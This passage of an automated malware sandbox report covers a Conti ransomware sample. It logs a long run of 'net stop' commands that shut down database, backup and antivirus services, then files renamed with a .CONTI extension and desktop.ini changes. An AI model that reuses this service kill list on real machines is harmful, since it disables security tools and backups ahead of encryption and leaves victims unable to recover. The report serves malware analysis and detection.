cmd.exe /c net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLSERVER /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLSERVER /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerOLAPService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MySQL57 /y

C:\Windows\SysWOW64\net.exe

net stop MySQL57 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MySQL57 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ntrtscan /y

C:\Windows\SysWOW64\net.exe

net stop ntrtscan /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ntrtscan /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net.exe

net stop OracleClientCache80 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop OracleClientCache80 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop PDVFSService /y

C:\Windows\SysWOW64\net.exe

net stop PDVFSService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop PDVFSService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop POP3Svc /y

C:\Windows\SysWOW64\net.exe

net stop POP3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop POP3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ReportServer$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop RESvc /y

C:\Windows\SysWOW64\net.exe

net stop RESvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop RESvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop sacsvr /y

C:\Windows\SysWOW64\net.exe

net stop sacsvr /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop sacsvr /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SamSs /y

C:\Windows\SysWOW64\net.exe

net stop SamSs /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SamSs /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVAdminService /y

C:\Windows\SysWOW64\net.exe

net stop SAVAdminService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVAdminService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SAVService /y

C:\Windows\SysWOW64\net.exe

net stop SAVService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SAVService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SDRSVC /y

C:\Windows\SysWOW64\net.exe

net stop SDRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SDRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SepMasterService /y

C:\Windows\SysWOW64\net.exe

net stop SepMasterService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SepMasterService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ShMonitor /y

C:\Windows\SysWOW64\net.exe

net stop ShMonitor /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ShMonitor /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop Smcinst /y

C:\Windows\SysWOW64\net.exe

net stop Smcinst /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop Smcinst /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SmcService /y

C:\Windows\SysWOW64\net.exe

net stop SmcService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SmcService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SMTPSvc /y

C:\Windows\SysWOW64\net.exe

net stop SMTPSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SMTPSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLBrowser /y

C:\Windows\SysWOW64\net.exe

net stop SQLBrowser /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLBrowser /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net.exe

net stop SQLSafeOLRService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSafeOLRService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net.exe

net stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLSERVERAGENT /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLTELEMETRY$ECWDB2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLWriter /y

C:\Windows\SysWOW64\net.exe

net stop SQLWriter /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLWriter /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBackupSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBackupSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamBrokerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCatalogSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamCloudSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamCloudSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploymentService /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploymentService /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamDeploySvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamDeploySvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamMountSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamMountSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamNFSSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamNFSSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamRESTSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamRESTSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamTransportSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamTransportSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop W3Svc /y

C:\Windows\SysWOW64\net.exe

net stop W3Svc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop W3Svc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop WRSVC /y

C:\Windows\SysWOW64\net.exe

net stop WRSVC /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop WRSVC /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net.exe

net stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop swi_update /y

C:\Windows\SysWOW64\net.exe

net stop swi_update /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop swi_update /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CXDB /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "SQL Backups" /y

C:\Windows\SysWOW64\net.exe

net stop "SQL Backups" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "SQL Backups" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net.exe

net stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop "Zoolz 2 Service" /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net.exe

net stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQLServerADHelper /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop msftesql$PROD /y

C:\Windows\SysWOW64\net.exe

net stop msftesql$PROD /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop msftesql$PROD /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net.exe

net stop NetMsmqActivator /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop NetMsmqActivator /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop EhttpSrv /y

C:\Windows\SysWOW64\net.exe

net stop EhttpSrv /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop EhttpSrv /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ekrn /y

C:\Windows\SysWOW64\net.exe

net stop ekrn /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ekrn /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop ESHASRV /y

C:\Windows\SysWOW64\net.exe

net stop ESHASRV /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop ESHASRV /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop AVP /y

C:\Windows\SysWOW64\net.exe

net stop AVP /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop AVP /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop klnagent /y

C:\Windows\SysWOW64\net.exe

net stop klnagent /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop klnagent /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop MSSQL$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net.exe

net stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop wbengine /y

C:\Windows\SysWOW64\net.exe

net stop wbengine /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop wbengine /y

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c net stop mfefire /y

C:\Windows\SysWOW64\net.exe

net stop mfefire /y

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 stop mfefire /y

Network

N/A

Files

memory/1204-54-0x0000000074E31000-0x0000000074E33000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2022-03-06 03:51

Reported

2022-03-06 03:54

Platform

win10v2004-en-20220113

Max time kernel

133s

Max time network

137s

Command Line

"C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe"

Signatures

Conti Ransomware

ransomware conti

Modifies extensions of user files

ransomware

Description Indicator Process Target
File renamed C:\Users\Admin\Pictures\SuspendStart.raw => C:\Users\Admin\Pictures\SuspendStart.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\SyncPing.raw => C:\Users\Admin\Pictures\SyncPing.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\SplitConnect.raw => C:\Users\Admin\Pictures\SplitConnect.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\UnprotectConfirm.raw => C:\Users\Admin\Pictures\UnprotectConfirm.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\UnlockRevoke.raw => C:\Users\Admin\Pictures\UnlockRevoke.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\ApproveNew.tiff C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\ApproveNew.tiff => C:\Users\Admin\Pictures\ApproveNew.tiff.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\GetSuspend.raw => C:\Users\Admin\Pictures\GetSuspend.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\ResolvePush.raw => C:\Users\Admin\Pictures\ResolvePush.raw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\CompleteRead.png => C:\Users\Admin\Pictures\CompleteRead.png.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\GroupUninstall.crw => C:\Users\Admin\Pictures\GroupUninstall.crw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File renamed C:\Users\Admin\Pictures\RestartApprove.crw => C:\Users\Admin\Pictures\RestartApprove.crw.CONTI C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Public\Music\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\3D Objects\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Libraries\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Camera Roll\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Pictures\Saved Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\AccountPictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Videos\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Links\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Desktop\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Documents\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Public\Pictures\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
File opened for modification C:\Users\Admin\Saved Games\desktop.ini C:\Users\Admin\AppData\Local\Temp\2452cf5c6fccf361fa27131d9b261a60253eef8b96e6e2f524c85beea6488bd0.exe N/A
